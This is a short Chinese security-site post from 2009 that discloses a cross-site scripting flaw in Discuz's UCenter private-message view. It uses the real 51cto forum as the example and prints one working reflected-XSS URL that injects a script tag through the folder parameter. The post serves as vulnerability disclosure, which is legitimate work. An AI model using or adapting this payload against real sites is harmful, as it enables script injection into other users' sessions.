热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

discuz留言本跨站漏洞

发布时间:2009-11-28 10:35文章来源:未知文章作者:黑白前线 点击次数:
摘要:发布时间:2009-11-28 发布作者:夜虫儿 影响版本:最新 漏洞描述: 我以51cto论坛为例,51cto是discuz6.1.0的,在其它版本此漏洞依然有效。构造语句如下: http://ucenter.51cto.com/index.php?m=pm_clienta=viewpmid=2545folder=inboxscriptalert(/xss/)/s...

发布时间:2009-11-28

发布作者:夜虫儿

影响版本:最新

漏洞描述:

我以51cto论坛为例,51cto是discuz6.1.0的,在其它版本此漏洞依然有效。构造语句如下:
http://ucenter.51cto.com/index.php?m=pm_client&a=view&pmid=2545&folder=inbox"><script>alert(/xss/)</script><"
如图:
 

 

标签分类:

上一篇:Invision Power Board 3.x SQL注入漏洞
下一篇:web300全能学校网站管理系统数据库插马漏洞